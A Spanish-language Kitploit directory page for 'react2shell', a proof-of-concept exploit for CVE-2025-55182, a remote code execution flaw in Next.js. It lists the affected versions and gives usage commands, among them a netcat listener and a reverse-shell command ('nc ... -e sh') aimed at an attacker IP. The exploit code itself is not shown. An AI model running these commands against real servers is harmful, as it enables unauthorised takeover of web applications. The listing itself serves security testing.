Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
react2shell — PoC para React2Shell (CVE-2025-55182) | Kitploit
Herramientas/GitHubGitHub/xkey8/react2shell
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónRed TeamingHerramienta de Acceso Remoto
GitHubxkey8/react2shell

react2shell

PoC para React2Shell (CVE-2025-55182)

Ver Repositorio
1hace 8 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

React2Shell

Exploit de prueba de concepto para CVE-2025-55182, una vulnerabilidad de ejecución remota de código no autenticada, también conocida como React2Shell. El script se utiliza para obtener una shell en versiones de Next.js anteriores a:

  • 15.0.4 y anteriores
  • 15.1.8 y anteriores
  • 15.2.5 y anteriores
  • 15.3.5 y anteriores
  • 15.4.7 y anteriores
  • 15.5.6 y anteriores
  • 16.0.6 y anteriores
  • 14.3.0-canary.77 y versiones posteriores

Solo se ha probado en la versión 16.0.6.

Uso

root@kitploit:~
$ ./react2shell.py --help
d8888b. d88888b  .d8b.   .o88b. d888888b .d888b. .d8888. db   db d88888b db      db
88  `8D 88'     d8' `8b d8P  Y8 `~~88~~' VP  `8D 88'  YP 88   88 88'     88      88
88oobY' 88ooooo 88ooo88 8P         88       odD' `8bo.   88ooo88 88ooooo 88      88
88`8b   88~~~~~ 88~~~88 8b         88     .88'     `Y8b. 88~~~88 88~~~~~ 88      88
88 `88. 88.     88   88 Y8b  d8    88    j88.    db   8D 88   88 88.     88booo. 88booo.
88   YD Y88888P YP   YP  `Y88P'    YP    888888D `8888Y' YP   YP Y88888P Y88888P Y88888P

usage: react2shell [-h] -u URL -i IP -p PORT

options:
  -h, --help       show this help message and exit
  -u, --url URL    Target URL
  -i, --ip IP      Attacker IP
  -p, --port PORT  Attacker port

verificar si el objetivo es vulnerable;

root@kitploit:~
./react2shell.py -u http://127.0.0.1:3000

iniciar un listener;

root@kitploit:~
$ nc -lvp 4444

iniciar una shell;

root@kitploit:~
$ ./react2shell.py -u http://127.0.0.1:3000 -i 127.0.0.1 -p 4444
$ ./react2shell.py -u http://127.0.0.1:3000 -c 'nc 127.0.0.1 4444 -e sh' # you can also provide a command


Referencias

  • https://gist.github.com/maple3142/48bc9393f45e068cf8c90ab865c0f5f3
  • https://nvd.nist.gov/vuln/detail/CVE-2025-55182
  • https://nextjs.org/blog/CVE-2025-66478
  • https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components
Descargar herramienta